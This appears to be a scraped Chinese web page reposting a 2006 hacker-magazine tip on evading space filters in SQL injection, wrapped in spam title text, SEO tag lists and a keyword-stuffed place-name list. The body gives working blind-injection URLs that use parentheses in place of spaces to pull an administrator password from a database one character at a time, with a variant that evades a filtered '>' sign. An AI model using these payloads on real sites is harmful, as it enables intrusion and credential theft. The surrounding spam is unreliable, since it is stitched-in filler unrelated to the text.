婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 突破空格的限制

突破空格的限制

熱門標簽:客服外呼系統呼叫中心 保定電銷機器人軟件 土地證宗地圖標注符號 電話機器人案例 鎮江云外呼系統怎么樣 成都銷售外呼系統公司 vue 地圖標注拖拽 自動外呼系統怎么防止封卡 電話機器人銷售公司嗎
關于空格,有許多替換方式,比如TAB空格,SQL數據庫中的/**/,但我又找到了另一種替換方式,已發表于《黑客手冊》2006.7期中,這里挑其精華,現一下吧!

對于SQL語句,大家還都習慣于其的空格,比如select id from [name],如果中間沒有了空格,那就成了selectidfrom[name], 一灘糊涂!除了上面所說到幾個空格的替代方法外,我發現用()括號在SQL中一樣可以運行,比如上面的語句,就可以寫成,select(id)from[name],有括號分隔,可以正常執行。
舉個例 子說一下,我們得到一個注入點:jmdcw.asp?name=aa'and 1=1 and ''=',如果替換其中的1=1為查詢管理員的密碼的語句:(select asc(mid(pass,1,1)) from [name] where id=1)>49。如何用空格呢?其實可以寫成這樣的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了和>符號,則用between…and…,語句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

對于中間應該出現空格的地方,用()進行替換,不過,對于很復雜的SQL語句就不太好用了。上面說到的是字符型的,如果是數值型,可以在id=1后加一個括號,不過這個我沒有測試,比如:jmdcw.asp?id=(1)and(select.....),應該是可行的吧?

呵呵,總結一下,和LOVESHELL上的朋友分享一下。 

標簽:內江 懷化 成都 重慶 天津 麗江 臺灣 公主嶺

巨人網絡通訊聲明:本文標題《突破空格的限制》,本文關鍵詞  突破,空格,的,限制,突破,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《突破空格的限制》相關的同類信息!
  • 本頁收集關于突破空格的限制的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 凭祥市| 历史| 婺源县| 徐州市| 彝良县| 长汀县| 封开县| 化隆| 西乌珠穆沁旗| 新郑市| 平乐县| 普格县| 秦安县| 龙口市| 眉山市| 扎鲁特旗| 日照市| 临朐县| 和平县| 抚顺市| 平顶山市| 万年县| 阿克苏市| 招远市| 财经| 来宾市| 普兰店市| 石楼县| 溆浦县| 新乡市| 海南省| 贵德县| 汕头市| 南丹县| 凭祥市| 钦州市| 尉氏县| 东丽区| 彰化县| 萨嘎县| 武安市|